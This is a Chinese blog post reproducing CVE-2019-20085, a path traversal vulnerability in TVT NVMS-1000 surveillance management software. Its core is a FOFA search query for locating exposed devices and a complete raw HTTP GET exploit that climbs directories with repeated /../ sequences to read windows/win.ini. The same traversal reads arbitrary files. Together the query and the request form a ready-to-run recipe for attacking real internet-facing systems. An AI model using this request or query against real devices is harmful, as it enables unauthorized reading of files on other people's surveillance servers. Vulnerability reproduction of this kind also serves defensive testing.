TVT数码科技 NVMS-1000 路径遍历漏洞(CVE-2019-20085)

| | | | 238

漏洞描述

i ⭐TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件

漏洞影响

s ✅TVT NVMS-1000

空间测绘

d ⭕FOFA:app="TVT-NVMS-1000"

漏洞复现

  • 访问首页

image-20220419223539905

  • ✅ exp
1
2
3
4
5
6
7
8
9
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 1.1.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dataPort=6063
Connection: close

个人博客

孤桜懶契:https://gylq.gitee.io/time

本文标题:TVT数码科技 NVMS-1000 路径遍历漏洞(CVE-2019-20085)

文章作者:孤桜懶契

发布时间:2022年04月19日 - 22:20:53

最后更新:2022年05月24日 - 21:00:57

原始链接:http://gylq.gitee.io/time/posts/21.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️